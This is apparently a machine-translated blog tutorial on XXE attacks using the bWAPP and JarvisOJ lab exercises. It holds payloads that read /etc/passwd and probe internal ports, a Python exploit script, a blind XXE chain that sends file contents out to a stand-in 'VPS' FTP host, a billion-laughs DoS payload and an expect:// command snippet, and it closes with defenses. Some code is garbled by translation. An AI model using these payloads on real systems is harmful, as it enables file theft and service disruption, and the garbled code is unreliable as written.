0x00, XXe vulnerability Attack instance
Attack Ideas:
1. Referencing external entities remote file reads
2. Blind XXE
3. Dos
0x01, external entity reference, with Echo
Experimental operating platform: The XXe topic on Bwapp Platform
Topic:
To grab a packet, click any bugs? button, grab the package as follows:
You can see that the xxe-1.php page transmits the XML data to the xxe-2.php page in post mode.
Since it is XML data, we can add a malicious external entity ourselves, and then make an entity call in the original XML data for the XXe attack.
Get the System Password file payload:
<?XML version= "1.0" encoding= "Utf-8"?><!DOCTYPE note[<! ENTITY XXe SYSTEM "FILE:///ETC/PASSWD">]><Reset><Login>&xxe;</Login><Secret>Any bugs?</Secret></Reset>
Read Site Directory arbitrary file payload:
<?XML version= "1.0" encoding= "Utf-8"?><!DOCTYPE note[<! ENTITY XXe SYSTEM "Http://127.0.0.1/bWAPP/robots.txt">]><Reset><Login>&xxe;</Login><Secret>Any bugs?</Secret></Reset>
To deepen understanding, view the source code of xxe-2.php
The main code:
You can see that the "simplexml_load_string ()" function is used directly here.
The purpose of the simplexml_load_string () function is to load an XML string into an object, and the function gets the XML content without any filtering. $login get the contents of the login tag and then stitch it to $message and display it on the screen.
Intranet Port Detection payload:
<?XML version= "1.0" encoding= "Utf-8"?><!DOCTYPE note[<! ENTITY XXe SYSTEM "http://127.0.0.1:80">]><Reset><Login>&xxe;</Login><Secret>Any bugs?</Secret></Reset>
If the 80 port is open, echo the following error message
If the port is not open, the following information is displayed:
Using Python to write a simple exp, test it as follows:
#Coding=utf-8ImportRequestsif __name__=='__main__': Payload= Raw_input ('Enter the resources you would like to use XXe to get, such as File:///etc/passwd\npayload:'. Decode ('Utf-8'). Encode ('GBK')) URL='http://192.168.31.195/bWAPP/xxe-2.php'Headers= {'Content-type':'Text/xml'} Cookies= {'Phpsessid':'4e2c24a64c85a86bc69b09736828af9b','Security_level':'0'} XML='<?xml version= "1.0" encoding= "UTF-8"? ><! DOCTYPE copyright[<! ENTITY Test SYSTEM "'+ Payload +'">]><reset><login>&test;</login><secret>login</secret></reset >'R= Requests.post (url,headers=headers,cookies=cookies,data=XML)Print 'XXe attack return Result:'. Decode ('Utf-8'). Encode ('GBK') PrintR.content
Operation Result:
Let's learn more about this XXe challenge of intermediate and advanced source code
//disables XML external entities. Doesn ' t work with older PHP versions! Libxml_disable_entity_loader (true); $xml=simplexml_load_string($body); //Debugging//Print_r ($xml); $login=$_session["Login"]; $secret=$xml-secret; if($secret) { $secret=mysqli_real_escape_string($link,$secret); $sql= "UPDATE users SET secret = '".$secret. "' WHERE login = '".$login. "‘"; //Debugging//Echo $sql; $recordset=$link->query ($sql); if(!$recordset) { die("Connect Error:".)$link-error); } $message=$login. "' s Secret has been reset!"; } Else { $message= "An error occured!"; }
As you can see from the analysis, $login is now taken directly from the seesion and no longer submitted using XML. and the mysqli_real_escape_string () function was used to escape the special character of $secret.
Example two:
A topic on JARVISOJ API call
The title of this problem is to try to obtain the flag value in the target machine/home/ctf/flag.txt.
Go to the topic http://web.jarvisoj.com:9882/Find an input box, we grab the packet
is a JSON data submission, modified data discovery can be parsed
This is a XXe question, how to get flag? Simply change the JSON to XML and then submit the XML document to
0x02, Blind XXE
If the server does not echo, you can only use the blind XXe vulnerability to construct a take-out data (OOB) channel to read the data.
So, how to use XXe without echo
Ideas:
1. Client sends payload 1 to Web server
2. The Web server obtains a malicious DTD from the VPS and performs a file read payload2
3. Web server with ECHO results access to specific FTP or HTTP on VPS
4. Get Echo via VPS (NC listening Port)
Local Client (payload 1)
<? XML version= "1.0" encoding= "UTF-8" ?> <! DOCTYPE Root [<! ENTITY% remote SYSTEM "http://vps/test.xml"> %remote;] >
Because the web side will decode, so we need to first HTML entity encoding once
Payload 2 is test.xml content (VPS)
<! ENTITY% Payload SYSTEM "FILE:///ETC/PASSWD" > <! ENTITY% int "<! ENTITY% trick SYSTEM ' ftp://VPS:21/%payload; ' > ">%int;%trick;
This is the first to assign the contents of the system's file protocol to the parameter entity%payload, the second step is to nest the entity, and trick is the contents of the Remote Access FTP protocol.
0X03, DOS
<?XML version= "1.0"?> <!DOCTYPE Lolz [<! ENTITY lol "LOL"><!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"><!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;& lol2; "><!ENTITY Lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;& lol3; "><!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;& Lol4; "><!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;& LOL5; "><!ENTITY Lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;& lol6; "><!ENTITY Lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;& LOL7; "><!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;& Lol8; ">]><lolz>&lol9;</lolz>
The principle is recursive reference, lol entity and "LOL" string, and then a lol2 entity refers to 10 lol entities, a lol3 entity refers to 10 lol2 entities, at this time a lol3 entity contains 10^2 "LOL" to such Push, LOL9 entity contains 10^8 "LOL" string, and then reference lol9.
0x04, command execution
PHP environment, XML command execution requires PHP to install expect extension, but the extension is not installed by default, so generally, more difficult to use, here is only the code
<? php $xml = <<<eof<?xml Version = "1.0" ?> <! DOCTYPE any [ <! ENTITY f SYSTEM "Except://ls">]><x>&f; </ x > EOF; $data = simplexml_load_string ($xml);p rint_r ($data);? >
0x05, Defense XXe
Methods for disabling external entities by using the development language
Php:
Libxml_disable_entity_loader (true);
Java:
Documentbuilderfactory dbf =documentbuilderfactory.newinstance ();d bf.setexpandentityreferences ( False);
Python:
from Import = Etree.parse (xmlsource,etree. Xmlparser (Resolve_entities=false))
Filtering user-supplied XML data
Filter Keyword: <\! DOCTYPE and <\! ENTITY, or system and public.
Does not allow the XML to contain its own defined DTD
[Web Security] XXe Vulnerability Defense Learning (middle)